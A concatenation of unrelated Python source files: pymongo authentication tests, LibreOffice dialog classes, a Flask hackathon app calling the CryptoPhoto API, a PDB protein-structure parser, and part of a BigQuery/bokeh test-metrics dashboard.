'?authMechanism=SCRAM-SHA-1' % (host, port))
client.pymongo_test.command('dbstats')
if self.replica_set_name:
client = MongoClient(host, port,
replicaSet='%s' % (self.replica_set_name,))
self.assertTrue(client.pymongo_test.authenticate(
'user', 'pass', mechanism='SCRAM-SHA-1'))
client.pymongo_test.command('dbstats')
uri = ('mongodb://user:pass'
'@%s:%d/pymongo_test?authMechanism=SCRAM-SHA-1'
'&replicaSet=%s' % (host, port, self.replica_set_name))
client = MongoClient(uri)
client.pymongo_test.command('dbstats')
db = client.get_database(
'pymongo_test', read_preference=ReadPreference.SECONDARY)
db.command('dbstats')
def tearDown(self):
client_context.rs_or_standalone_client.pymongo_test.remove_user('user')
class TestAuthURIOptions(unittest.TestCase):
@client_context.require_auth
def setUp(self):
client = MongoClient(host, port)
response = client.admin.command('ismaster')
self.replica_set_name = str(response.get('setName', ''))
client_context.client.admin.add_user('admin', 'pass',
roles=['userAdminAnyDatabase',
'dbAdminAnyDatabase',
'readWriteAnyDatabase',
'clusterAdmin'])
client.admin.authenticate('admin', 'pass')
client.pymongo_test.add_user('user', 'pass',
roles=['userAdmin', 'readWrite'])
if self.replica_set_name:
# GLE requires authentication.
client.admin.authenticate('admin', 'pass')
# Make sure the admin user is replicated after calling add_user
# above. This avoids a race in the replica set tests below.
client.admin.command('getLastError', w=len(response['hosts']))
self.client = client
def tearDown(self):
self.client.admin.authenticate('admin', 'pass')
self.client.pymongo_test.remove_user('user')
self.client.admin.remove_user('admin')
self.client.pymongo_test.logout()
self.client.admin.logout()
self.client = None
def test_uri_options(self):
# Test default to admin
client = MongoClient('mongodb://admin:pass@%s:%d' % (host, port))
self.assertTrue(client.admin.command('dbstats'))
if self.replica_set_name:
uri = ('mongodb://admin:pass'
'@%s:%d/?replicaSet=%s' % (host, port, self.replica_set_name))
client = MongoClient(uri)
self.assertTrue(client.admin.command('dbstats'))
db = client.get_database(
'admin', read_preference=ReadPreference.SECONDARY)
self.assertTrue(db.command('dbstats'))
# Test explicit database
uri = 'mongodb://user:pass@%s:%d/pymongo_test' % (host, port)
client = MongoClient(uri)
self.assertRaises(OperationFailure, client.admin.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
if self.replica_set_name:
uri = ('mongodb://user:pass@%s:%d'
'/pymongo_test?replicaSet=%s' % (host, port, self.replica_set_name))
client = MongoClient(uri)
self.assertRaises(OperationFailure,
client.admin.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
db = client.get_database(
'pymongo_test', read_preference=ReadPreference.SECONDARY)
self.assertTrue(db.command('dbstats'))
# Test authSource
uri = ('mongodb://user:pass@%s:%d'
'/pymongo_test2?authSource=pymongo_test' % (host, port))
client = MongoClient(uri)
self.assertRaises(OperationFailure,
client.pymongo_test2.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
if self.replica_set_name:
uri = ('mongodb://user:pass@%s:%d/pymongo_test2?replicaSet='
'%s;authSource=pymongo_test' % (host, port, self.replica_set_name))
client = MongoClient(uri)
self.assertRaises(OperationFailure,
client.pymongo_test2.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
db = client.get_database(
'pymongo_test', read_preference=ReadPreference.SECONDARY)
self.assertTrue(db.command('dbstats'))
class TestDelegatedAuth(unittest.TestCase):
@client_context.require_auth
@client_context.require_version_max(2, 5, 3)
@client_context.require_version_min(2, 4, 0)
def setUp(self):
self.client = client_context.rs_or_standalone_client
def tearDown(self):
self.client.pymongo_test.remove_user('user')
self.client.pymongo_test2.remove_user('user')
self.client.pymongo_test2.foo.drop()
def test_delegated_auth(self):
self.client.pymongo_test2.foo.drop()
self.client.pymongo_test2.foo.insert_one({})
# User definition with no roles in pymongo_test.
self.client.pymongo_test.add_user('user', 'pass', roles=[])
# Delegate auth to pymongo_test.
self.client.pymongo_test2.add_user('user',
userSource='pymongo_test',
roles=['read'])
auth_c = MongoClient(host, port)
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.foo.find_one)
# Auth must occur on the db where the user is defined.
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.authenticate,
'user', 'pass')
# Auth directly
self.assertTrue(auth_c.pymongo_test.authenticate('user', 'pass'))
self.assertTrue(auth_c.pymongo_test2.foo.find_one())
auth_c.pymongo_test.logout()
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.foo.find_one)
# Auth using source
self.assertTrue(auth_c.pymongo_test2.authenticate(
'user', 'pass', source='pymongo_test'))
self.assertTrue(auth_c.pymongo_test2.foo.find_one())
# Must logout from the db authenticate was called on.
auth_c.pymongo_test2.logout()
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.foo.find_one)
if __name__ == "__main__":
unittest.main()
|
|
# Copyright 2012 Tsutomu Uchino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bookmarks.values import PosSize
class BaseDialog(object):
""" Base class for all dialogs. """
def __init__(self, ctx, reuse=False, **kwds):
self.ctx = ctx
self.reuse = reuse
self.args = kwds
self.dialog = None
def _result(self):
""" Returns result of the dialog executed.
When canceled, None is returned. """
return None
def create_dialog(self):
""" Create instance of dialog for this dialog instance."""
pass
def _init(self):
""" Initialize something. """
pass
def _dispose(self):
""" Destruct dialog. """
pass
def execute(self):
""" Execute dialog and returns result. """
if self.dialog is None:
self.create_dialog()
self._init()
result = None
if self.dialog.execute():
result = self._result()
if not self.reuse:
self.dialog.dispose()
self.dialog = None
self._dispose()
return result
def create_service(self, name):
""" Instantiate servie. """
return self.ctx.getServiceManager().createInstanceWithContext(
name, self.ctx)
class DialogBase(BaseDialog):
""" Base class for dialogs. """
WIDTH_DIALOG = 400
HEIGHT_DIALOG = 400
HEIGHT_LABEL = 25
HEIGHT_BUTTON = 25
HEIGHT_EDIT = 25
def __init__(self, ctx, res=None, reuse=False, **kwds):
BaseDialog.__init__(self, ctx, reuse, **kwds)
self.res = res
def _(self, name):
""" Get resource by name. """
return res.get(name, name)
def create_dialog(self):
self.dialog = self._create_dialog()
def _init(self):
pass
def get(self, name):
""" Get control from dialog. """
return self.dialog.getControl(name)
def set_focus(self, name):
self.get(name).setFocus()
def get_text(self, name):
""" Get text from control. """
return self.get(name).getModel().Text
def set_text(self, name, text):
""" Set text to the control having Text property. """
self.get(name).getModel().Text = text
def get_label(self, name):
""" Get label text from the control. """
return self.get(name).getModel().Label
def set_label(self, name, label):
""" Set label text to the control. """
self.get(name).getModel().Label = label
def select_text(self, name):
""" Select all text in the edit field. """
from com.sun.star.awt import Selection
self.get(name).setSelection(Selection(0, 1000))
def get_state(self, name):
""" Get state of check box. """
return self.get(name).getModel().State
def set_state(self, name, state):
""" Set state of checkbox. """
self.get(name).getModel().State = state
def set_enable(self, name, state):
self.get(name).setEnable(state)
class BuiltinDialog(BaseDialog):
""" Base class for wrapper dialogs of built-in dialogs.
_result and _init methods have to be implemented by subclass.
"""
SERVICE_NAME = None
DEFALUT_TITLE = ""
NAME_TITLE = "title"
def _set_title(self):
""" Set title from args. """
if self.NAME_TITLE in self.args:
self.dialog.setTitle(self.args[self.NAME_TITLE], self.DEFALUT_TITLE)
def create_dialog(self):
""" Initialize dialog by SERVICE_NAME instance variable. """
self.dialog = self.create_service(self.SERVICE_NAME)
class FolderDialog(BuiltinDialog):
""" Let user to choose a folder. """
SERVICE_NAME = "com.sun.star.ui.dialogs.FolderPicker"
NAME_FOLDER = "directory"
NAME_DESCRIPTION = "description"
def _result(self):
return self.dialog.getDirectory()
def _init(self):
""" Initialize dialog. These keyword arguments can be
used to initialize dialog.
directory: initial directory.
description: short description about to choose a folder.
"""
self._set_title()
dialog = self.dialog
args = self.args
if self.NAME_FOLDER in args:
dialog.setDisplayDirectory(args[self.NAME_FOLDER])
if self.NAME_DESCRIPTION in args:
dialog.setDescription(args[self.NAME_DESCRIPTION])
class FileDialogBase(BuiltinDialog):
""" Base class for file picker dialog. """
SERVICE_NAME = "com.sun.star.ui.dialogs.FilePicker"
INITIALIZE_TEMPLATE = 0
NAME_INITIALIZE = "initialize"
NAME_DIRECTORY = "directory"
NAME_MULTI = "multi"
NAME_DEFAULT = "default"
NAME_FILTERS = "filters"
NAME_CURRENT_FILTER = "current_filter"
NAME_HELP = "help"
NAME_FILTER_MANAGER = "filter_manager"
def get_filter(self):
""" Returns current filter selected. """
try:
return self.selected_filter
except:
return self.dialog.getCurrentFilter()
def _result(self):
""" Returns selected file URLs.
When a file selected, simply an URL is returned.
Otherwise list of file URL is returned, all URL in
full length.
"""
self.selected_filter = self.get_filter()
files = self.dialog.getFiles()
if len(files) == 1:
return files[0]
else:
base_url = files[0]
return [base_url + "/" + name for name in files[1:]]
def _init(self):
""" Initialize filepicker dialog. Following keyword
arguments can be used to initialize.
"""
self._set_title()
self._init_type()
self._init_variables()
def _init_type(self):
dialog = self.dialog
args = self.args
if self.NAME_INITIALIZE in args:
initialize = args[self.NAME_INITIALIZE]
else:
initialize = self.INITIALIZE_TEMPLATE
dialog.initialize((initialize, ))
def _init_variables(self):
dialog = self.dialog
args = self.args
if self.NAME_DIRECTORY in args:
dialog.setDisplayDirectory(args[self.NAME_DIRECTORY])
if self.NAME_MULTI in args:
dialog.setMultiSelectionMode(args[self.NAME_MULTI])
if self.NAME_DEFAULT in args:
dialog.setDefaultName(args[self.NAME_DEFAULT])
if self.NAME_FILTERS in args:
filters = args[self.NAME_FILTERS]
for filter in filters:
dialog.appendFilter(filter[0], filter[1])
if self.NAME_CURRENT_FILTER in args:
dialog.setCurrentFilter(args[self.NAME_CURRENT_FILTER])
if self.NAME_HELP in args:
dialog.HelpURL = args[self.NAME_HELP]
if self.NAME_FILTER_MANAGER in args:
args[self.NAME_FILTER_MANAGER].set_filters(dialog)
from com.sun.star.ui.dialogs.TemplateDescription import \
FILEOPEN_SIMPLE as TD_FILEOPEN_SIMPLE, \
FILESAVE_SIMPLE as TD_FILESAVE_SIMPLE, \
FILESAVE_AUTOEXTENSION_SELECTION as TD_FILESAVE_AUTOEXTENSION_SELECTION
class FileOpenDialog(FileDialogBase):
""" Let user to choose files to open. """
INITIALIZE_TEMPLATE = TD_FILEOPEN_SIMPLE
class FileSaveDialog(FileDialogBase):
""" Let user to choose files to store. """
INITIALIZE_TEMPLATE = TD_FILESAVE_SIMPLE
from com.sun.star.ui.dialogs.ExtendedFilePickerElementIds import \
CHECKBOX_AUTOEXTENSION, CHECKBOX_SELECTION
class FileSaveAutoExtensionAndSelectionDialog(FileSaveDialog):
INITIALIZE_TEMPLATE = TD_FILESAVE_AUTOEXTENSION_SELECTION
def get_filter_extension(self):
filter = self.get_filter()
filters = self.args[self.NAME_FILTERS]
found = None
for f in filters:
if f[0] == filter:
found = f[1]
if found:
parts = found.split(";")
description = parts[0]
return description.strip("*")
return ""
def is_auto_extension_selected(self):
return self.dialog.getValue(CHECKBOX_AUTOEXTENSION, 0)
def is_selection_only_selected(self):
return self.dialog.getValue(CHECKBOX_SELECTION, 0)
def is_selection_only(self):
return self.selection_only
def _result(self):
""" Returns selected file URLs.
When a file selected, simply an URL is returned.
Otherwise list of file URL is returned, all URL in
full length.
"""
files = self.dialog.getFiles()
if len(files) == 1:
file_url = files[0]
else:
return None
self.selection_only = self.is_selection_only_selected()
if self.is_auto_extension_selected():
ext = self.get_filter_extension()
if ext and not file_url.endswith(ext):
file_url += ext
return file_url
|
|
# This is the HealthCraft Govhack2017 entry from high-fliers team.
from flask import Flask, render_template, request
import sys
from CryptoPhotoUtils import CryptoPhotoUtils
import urllib, hashlib, hmac, time, json, base64 # CryptoPhoto dependencies
import requests
app = Flask(__name__)
app.config.from_pyfile('config.cfg')
testv = app.config['FOO']
privatekey = app.config['CP_PUBLICKEY']
publickey = app.config['CP_PRIVATEKEY']
salt = app.config['CP_SALT']
test_uid = "12345" # This is the UserID of your customer. (It does not get revealed)
server = "https://cryptophoto.com"
cp = CryptoPhotoUtils(server, privatekey, publickey, test_uid)
# the root of the site
@app.route("/")
def index():
return render_template('index.html',test=testv)
@app.route("/signup", methods=['GET','POST'])
def signup():
if request.method == 'POST':
return do_the_signup()
else:
return render_template('signup.html')
def do_the_signup():
# Adjust this to get the customer's IP address from your web server environment
#r = request.remote_addr requests.get("http://curlmyip.com/")
ip = request.remote_addr #r.text
print 'ip is %s\n' % (ip)
# Request a new CP session
rv = cp.start_session(ip)
if rv["is_valid"]:
print 'Session ID: %s \n' % (cp.session_id) # You need this for calls to CP
else:
print 'Error1: %s\n' % (rv["error"])
rv = cp.get_gen_widget()
if rv["is_valid"]:
print 'Generate Token Form: %s \n' % (rv["html"]) # This is HTML for your web page to use
else:
print 'Error2: %s\n' % (rv["error"])
# Request a new CP session
rv = cp.start_session(ip, True)
rv = cp.get_auth_widget()
if rv["is_valid"]:
print 'Auth Token Form: %s\n' % (rv["html"]) # So is this
else:
print 'Error3: %s\n' % (rv["error"])
# Verifies the response to a given challenge
# This is just a demo of how the function should be used; without valid
# parameters, it is natural that it will return an error message, it is
# supposed to work when integrated with the login, when you provide
# a real, valid IP and valid authentication codes.
rv = cp.verify_response('selector', 'response_row', 'response_col', 'cp_phc', ip)
if rv["is_valid"]:
print 'Authenticated %s \n' % (rv["message"])
else:
print 'Error: %s\n' % (rv["error"])
return render_template('hello.html',test=testv)
@app.route("/account")
def account():
ip = request.remote_addr #r.text
res = get_api_session(test_uid,ip)
display = ''
error = ''
sid = ''
if res['is_valid']:
sid = res['sid']
else:
error = res['error']
if 'errdesc' is res:
error += res['errdesc']
if sid:
display = ("<div id='cp_widget'>Loading...</div>"
"<script type='text/javascript'"
"src='https://cryptophoto.com/api/token?sd=" + sid + "'>"
"</script>")
elif error:
display = "<div>Error: " + error + "</div>"
out = '''<html>
<head>
<meta charset="UTF-8">
<title>User Account</title>
</head>
<body>
<h2>Manage Your Token</h2>
{display}
</body>
</html>'''
out = out.format(display=display)
print 'out=%s\n' % (out)
return out # render_template('account.html',content = out)
@app.route("/main")
def main():
return render_template('main.html')
def get_api_session(uid, ip, authentication = False):
uid = hashlib.sha1(uid + salt).hexdigest()
t = int(time.time())
sign = hmac.new(privatekey, privatekey + str(t) + uid + publickey, hashlib.sha1).hexdigest()
postdata = {
'publickey' : publickey,
'uid' : uid,
'time' : t,
'signature' : sign,
'ip' : ip
}
if authentication:
postdata["authentication"] = "true"
response = urllib.urlopen("https://cryptophoto.com/api/get/session", urllib.urlencode(postdata))
ret = {}
if not response:
ret["is_valid"] = False
ret["error"] = "service-unavailable"
return ret
return_values = response.read().splitlines()
try:
if return_values[0] == 'success':
ret["is_valid"] = True
ret["sid"] = return_values[1]
ret["has_token"] = True if return_values[2] == 'true' else False
else:
ret["is_valid"] = False
ret["error"] = return_values[1]
ret["errip"] = return_values[3] if len(return_values) == 4 else ''
except:
ret["is_valid"] = False
ret["error"] = 'malformed-response'
return ret
def verify_cptv_response(POST):
ret = {}
if 'cpJWSrfc7515' not in POST:
ret["is_valid"] = False
ret["error"] = 'JWT token not provided'
return ret
postdata = {
'token': POST['cpJWSrfc7515']
}
response = urllib.urlopen("https://cryptophoto.com/api/verify/cptv.json", urllib.urlencode(postdata))
if not response:
ret["is_valid"] = False
ret["error"] = "service-unavailable"
return ret
return_value = response.read()
try:
obj = json.loads(return_value)
except:
ret["is_valid"] = False
ret["error"] = "CRYPTOPHOTO responded with invalid format"
return ret
if 'success' not in obj or not obj['success']:
ret["is_valid"] = False
ret["error"] = obj['description']
return ret
jwt = POST['cpJWSrfc7515'];
tks = string.split(jwt, '.');
payload = json.loads(base64.urlsafe_b64decode(tks[1]))
if not payload or 'fieldsOrder' not in payload or 'fieldsSha256' not in payload:
ret["is_valid"] = False
ret["error"] = 'JWT payload missing fields'
return ret
fields = string.split(payload['fieldsOrder'], ',')
shacontent = ''
for field in fields:
if field in POST and POST[field]:
shacontent += POST[field]
shacontent = base64.b64encode(hashlib.sha256(shacontent).digest())
fieldsSha256 = payload['fieldsSha256']
fieldsSha256 = fieldsSha256.rstrip('=')
shacontent = shacontent.rstrip('=')
if fieldsSha256 == shacontent:
ret["is_valid"] = True
else:
ret["is_valid"] = False
ret["error"] = 'POSTed field values have been changed'
return ret
# Do not change below
if __name__ == "__main__":
if len(sys.argv) >1:
if sys.argv[1]=="--home":
app.run()
else:
app.run(host='0.0.0.0', port=443, ssl_context=('../healthcraft.crt', '../healthcraft.key'))
|
|
from entities.atom import Atom
from entities.hetatm import Hetatm
from entities.aminoacids import aminoacids
from numpy import matrix, dot, sqrt
from libraries.rotationMatrices import *
class PDB:
"""Please, take care of working with different models, I haven't checked it properly
For each entity in the PDB, the model number is stored
"""
def __init__(self, pdbFileName):
self.__file = open(pdbFileName, "r")
self.__fileName = pdbFileName
self.atoms = {}
self.hetatms = {}
self.__rest = {}
self.__numberOfLines = 0
self.__firstResidue = 0
self.residues = {}
self.intSeqRes = {}
self.CAlphas = {}
def load_atoms_hetams(self):
"""Loads every atom and hetam to its corresponding structure. The key of each line is its line number
Each atom/hetam holds the model it belongs to.
rest is for when only rotation or translation operations are performed.
"""
i = 0
modelNumber = 0
for line in self.__file:
if line.startswith("ENDMDL"):
modelNumber+=1
self.__rest[i] = line
else:
if line.startswith("ATOM"):
self.atoms[i] = Atom(line,modelNumber)
else:
if line.startswith("HETATM"):
self.hetatms[i]= Hetatm(line,modelNumber)
else:
if not line.isspace():
self.__rest[i] = line
i+=1
self.__numberOfLines = i
self.__file.close()
#To extract the atoms of a residue
if len(self.atoms)>0:
firstAtomOrder = min(self.atoms.keys())
self.__firstResidue = (self.atoms[firstAtomOrder].resSeq,self.atoms[firstAtomOrder].iCode)
#print "atoms " + str(len(self.atoms))
#print "hetatms " + str(len(self.hetatms))
#print "rest " + str(len(self.__rest))
def serialize(self, newPDBfileName):
"""This method doesn't consider the model """
newFile = open(newPDBfileName, "w")
i = 0
while i < self.__numberOfLines:
if self.atoms.get(i):
newFile.write(self.atoms.get(i).toString())
newFile.write("\n")
else:
if self.hetatms.get(i):
newFile.write(self.hetatms.get(i).toString())
newFile.write("\n")
else:
if self.__rest.get(i):
newFile.write(self.__rest.get(i))
i+=1
newFile.close()
def shift(self, vector):
"""Adds vector to every atom and hetatm coordinates"""
for a in self.atoms.values():
a.shift(vector)
for h in self.hetatms.values():
h.shift(vector)
def rotate(self, rotationMatrix, center):
""" Rotates every atom considering center as the center of rotation"""
for a in self.atoms.values():
a.center(center)
a.rotate(rotationMatrix)
for h in self.hetatms.values():
h.center(center)
h.rotate(rotationMatrix)
def chimera_transform(self, center, rotationMatrix, shift):
"""For each atom, hetatm is first centered in the center of coordinates, then rotated, then shifted, and finally recentered
transform = lambda atom, center, shift, rotationMatrix: rotationMatrix*(atom - center)+shift+center
"""
for a in self.atoms.values():
a.center(center)
a.rotate(rotationMatrix)
a.shift(shift+center)
for h in self.hetatms.values():
h.center(center)
h.rotate(rotationMatrix)
h.shift(shift+center)
def ash_transform(self, center, rotationMatrix, shift):
"""For each atom, hetatm is first centered in the center of coordinates, then rotated an finally shifted
transform = lambda atom, center, shift, rotationMatrix: rotationMatrix*(atom - center)+shift
"""
for a in self.atoms.values():
a.center(center)
a.rotate(rotationMatrix)
a.shift(shift)
for h in self.hetatms.values():
h.center(center)
h.rotate(rotationMatrix)
h.shift(shift)
def itk_transform(self, matrix, shift):
for a in self.atoms.values():
a.itk_ops(matrix, shift)
for h in self.hetatms.values():
h.itk_ops(matrix, shift)
def getHighestOccupancyLocation(self, anAtom):
"""Some of the atoms of the residue can have an unique conformation (== ' ') and so an occupancy factor or 1
This algorithm returns the location with highest occupancy
"""
occupancy = anAtom.occupancy
location = anAtom.altLoc
for atom in self.atoms.values():
if anAtom.model == atom.model:
if anAtom.resSeq == atom.resSeq:
if atom.altLoc != anAtom.altLoc:
if atom.altLoc != ' ' and atom.occupancy > anAtom.occupancy:
occupancy = atom.occupancy
location = atom.altLoc
return location
def getAtomsFromSegment(self,chain, start, stop, startInsertion, stopInsertion, startOrder, stopOrder, model=0, onlyBackbone=False):
""" returns a dictionary of the atoms of the backbone in a chain in a segment
Please, take into account that the atoms are NOT stored in ORDER. Those are in a dictionary
The atoms that not fulfil the conditions are not included in the dictionary
"""
segmentAtoms = {}
highestAltLocation = ''
for (lineNumber,atom) in self.atoms.items():
if atom.inModel(model):
if atom.inChain(chain):
if atom.inInsertionsSegment(start, stop,startInsertion, stopInsertion, startOrder, stopOrder):
if onlyBackbone and atom.inBackbone():
if atom.hasAlternateLocations():
highestAltLocation = self.getHighestOccupancyLocation(atom)
if atom.inhighestConformation(highestAltLocation):
segmentAtoms[lineNumber] = atom
else:
segmentAtoms[lineNumber] = atom
else:
if atom.hasAlternateLocations():
highestAltLocation = self.getHighestOccupancyLocation(atom)
if atom.inhighestConformation(highestAltLocation):
segmentAtoms[lineNumber] = atom
else:
segmentAtoms[lineNumber] = atom
return segmentAtoms
def getAtomsFromDomain(self, segments, model=0, onlyBackbone=False):
"""returns a set of the atoms of the backbone or all in a chain for every segment of the domain
segments = ((chain, start, stop, startInsertion, stopInsertion))
"""
domainAtoms = []
for segment in segments:
startOrder = self.orderOfInsertions(segment[1])
stopOrder = self.orderOfInsertions(segment[2])
domainAtoms.append(self.getAtomsFromSegment(segment[0], int(segment[1]),int(segment[2]),segment[3],segment[4],startOrder, stopOrder, model, onlyBackbone))
return domainAtoms
def getRestForSegments(self, segments):
"""@TODO Get the rest of the structures to compose a pdb """
pass
def serializeSegments(self, segments, domainFileName, model=0,onlyBackbone=False):
"""Stores the selected segments of the pdb in the domainFileName.
The segments structure is a list -segments = []- composed by -segments.append() - a (chain, start, stop) segments
A new serial for each atom is set. If more than 1 model is found, the first model is used.
"""
file = open(domainFileName, "w")
domains = self.getAtomsFromDomain(segments,model,onlyBackbone)
newSerial = 1
for segment in domains:
orderedKeys = segment.keys()
orderedKeys.sort()
for lineNumber in orderedKeys:
file.write("%s\n" %(segment[lineNumber].toString(newSerial),))
newSerial+=1
file.write("%s\n" % ("END"+77*" ", ))
file.close()
def centerOfMass(self,model=0):
"""This method considers only the atoms in a model"""
cm = matrix([0.0, 0.0, 0.0]).T
weight = 0.0
for a in self.atoms.values():
if a.inModel(model):
cm += a.atomicWeight()*a.coordinates
weight+= a.atomicWeight()
return cm/weight
def sphereRadius(self,model=0):
"""returns the radius of the sphere the pdb is contained, and the center of mass """
cm = self.centerOfMass(model)
radius = 0.0
for a in self.atoms.values():
if a.inModel(model):
dist_vector = (a.coordinates - cm).A.ravel()
distance = sqrt(dot(dist_vector,dist_vector))
print distance
if distance > radius:
radius = distance
return (cm, radius)
def orderOfInsertions(self, resSeq):
"""The order of the insertions is defined as the backwards or forwards alphasbetical order that is A,B,C ... or ...C, B, A
to do this, a couple of consecutive atoms sharing the order, with an iCode != '' are found, and after that, the order is determined.
True if the order is from A to Z False otherwise.
"""
firstAtom = None
for atom in self.atoms.values():
if atom.resSeq == resSeq and atom.iCode != '' and firstAtom is None:
firstAtom = atom
continue
if firstAtom is not None and atom.resSeq == resSeq and atom.iCode !='' and firstAtom.iCode != atom.iCode:
return firstAtom.iCode < atom.iCode
else:
firstAtom = None
return True
def fasta(self, fastaFileName, model=0):
"""generates a fasta file of the pdb selecting the aminoacids of the atoms in the model and /or in the backbone """
fastaFile = open(fastaFileName,"w")
fastaFile.write(">%s Model %d \n" % (self.__fileName, model))
keys = self.atoms.keys()
keys.sort()
resSeq = -1
iCode = ''
currentLine = []
for line in keys:
if self.atoms[line].inModel(0):
if self.atoms[line].resSeq != resSeq or self.atoms[line].iCode != iCode:
if len(currentLine) < 79:
currentLine.append(aminoacids[self.atoms[line].residue])
else:
currentLine.append(aminoacids[self.atoms[line].residue])
fastaFile.write("%s\n" % ''.join(currentLine))
currentLine = []
resSeq = self.atoms[line].resSeq
iCode = self.atoms[line].iCode
fastaFile.write("%s\n" % ''.join(currentLine))
fastaFile.close()
def getAtomsFromResidue(self, intSeqRes):
""""Returns the atoms associated with a residue. The intResSeq parameter is the order the residue occupies in its pdb,
considering the iCodes (insertion codes).LoadResidues and LoadIntSeqRes methods must be called before using getAtomsFromResidue"""
atoms = []
residue = self.getIntSeqRes(intSeqRes)
for atom in self.atoms.values():
if atom.getResidue() == residue:
atoms.append(atom)
return atoms
def getCAlphaFromResidue(self, intSeqRes):
"""Returns the CAlpha of the residue.The intResSeq parameter is the order the residue occupies in its pdb,
considering the iCodes (insertion codes).LoadResidues and LoadIntSeqRes methods must be called before using getAtomsFromResidue"""
residue = self.getIntSeqRes(intSeqRes)
for atom in self.atoms.values():
if atom.isCAlpha() and atom.getResidue() == residue:
return atom
def getFirstResidue(self):
"""returns the first residue in the pdb defined as the (atom.SeqRes,atom.iCode) """
return self.__firstResidue
def getIntSeqRes(self, intSeqRes):
"""Returns the residue defined as (atom.seqRes, atom.iCode) """
return self.intSeqRes.get(intSeqRes)
def loadIntSeqRes(self):
"""to work, loadResidues must be called before"""
for (key, value) in self.residues.items():
self.intSeqRes[value] = key
def loadResidues(self):
"""loads the residues of the pdb, defining a residue as (atom.seqRes, atom.iCode) for any different combination in the pdb """
intResSeq = 0
for atom in self.atoms.values():
if not self.residues.has_key(atom.getResidue()):
self.residues[atom.getResidue()]= intResSeq
intResSeq+=1
|
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import math
import os
from absl import logging
from bokeh.layouts import column, row
from bokeh.models import CategoricalColorMapper, ColumnDataSource, Div, HoverTool
from bokeh.plotting import figure
import javascript_utils
import utils
import numpy as np
# For a given list of test_names and metric_names, find the history of metrics.
QUERY = """
SELECT
metrics.test_name,
metrics.metric_name,
SAFE_CAST(DATE(metrics.timestamp, 'US/Pacific') AS STRING) AS run_date,
metrics.metric_value,
job.job_status,
job.stackdriver_logs_link AS logs_link,
job.logs_download_command,
job.uuid
FROM (
SELECT
x.test_name,
x.metric_name,
x.timestamp,
x.metric_value,
x.uuid
FROM (
SELECT
test_name,
metric_name,
SAFE_CAST(DATE(timestamp, 'US/Pacific') AS STRING) AS run_date,
max(farm_fingerprint(uuid)) as max_uuid
FROM
`{metric_table_name}`
WHERE
timestamp > '{cutoff_date}' AND
{test_name_where_clause} AND
{metric_name_where_clause}
GROUP BY
test_name, metric_name, run_date
) AS y
INNER JOIN `{metric_table_name}` AS x
ON
y.test_name = x.test_name AND
y.metric_name = x.metric_name AND
y.max_uuid = farm_fingerprint(x.uuid)
) AS metrics
INNER JOIN `{job_table_name}` AS job
ON
metrics.uuid = job.uuid
ORDER BY
run_date DESC
"""
def get_query_config(test_names, metric_names):
query_params = []
def _add_params(column_name, names):
for i, name in enumerate(names):
query_params.append({
'name': f'{column_name}{i}',
'parameterType': {'type': 'STRING'},
'parameterValue': {'value': name},
})
_add_params('test_name', test_names)
_add_params('metric_name', metric_names)
return {
'query': {
'parameterMode': 'NAMED',
'queryParameters': query_params,
}
}
def get_query(test_names, metric_names):
# Note that Bigquery does not support ANY, otherwise we could use a simpler
# query such as "WHERE test_name LIKE ANY(...)".
def _make_where_clause(column_name, names):
where_clause = f'({column_name} LIKE @{column_name}0'
for i in range(1, len(names)):
where_clause += f' OR {column_name} LIKE @{column_name}{i}'
where_clause += ')'
return where_clause
# TODO: Maybe make the cutoff date configurable.
cutoff_date = (datetime.datetime.now() - datetime.timedelta(
days=30)).strftime('%Y-%m-%d')
query = QUERY.format(**{
'job_table_name': os.environ['JOB_HISTORY_TABLE_NAME'],
'metric_table_name': os.environ['METRIC_HISTORY_TABLE_NAME'],
'test_name_where_clause': _make_where_clause('test_name', test_names),
'metric_name_where_clause': _make_where_clause(
'metric_name', metric_names),
'cutoff_date': cutoff_date,
})
return query
def fetch_data(test_names, metric_names):
if not test_names or not metric_names:
raise ValueError('Neither test_names nor metric_names can be empty.')
dataframe = utils.run_query(
get_query(test_names, metric_names),
cache_key=('metrics-{}-{}'.format(str(test_names), str(metric_names))),
config=get_query_config(test_names, metric_names))
return dataframe
def make_html_table(data_grid):
if not data_grid:
return ''
cell_width = 100
normal_style = f'style="width:{cell_width}px; border:1px solid #cfcfcf"'
alert_style = f'style="width:{cell_width}px; border:1px solid #cfcfcf; background-color: #ff8a8a"'
table_width = cell_width * len(data_grid[0])
table_html = f'<table style="width:{table_width}px">'
first_row = True
for row in data_grid:
values = []
for col in row:
try:
values.append(float(col))
except ValueError:
continue
# First row uses '<th>' HTML tag, others use '<td>'.
tag_type = 'h' if first_row else 'd'
table_html += '<tr>'
for col in row:
# Use normal cell style unless the cell's value is unusually high or low.
style = normal_style
try:
v = float(col)
# Find the mean/stddev of this row's values but make sure to exclude
# the current value.
values_copy = list(values)
for i, x in enumerate(values_copy):
if math.isclose(x, v):
values_copy.pop(i)
mean = np.mean(values_copy) if len(values_copy) >= 5 else 0
stddev = np.std(values_copy) if len(values_copy) >= 5 else 0
if stddev > 0 and (abs(v - mean) / stddev) > 5.0:
style = alert_style
except ValueError:
pass
table_html += f'<t{tag_type} {style}>{col}</t{tag_type}>'
table_html += '</tr>'
first_row = False
table_html += '</table>'
return table_html
def make_plots(test_names, metric_names, dataframe):
if not dataframe['metric_name'].any():
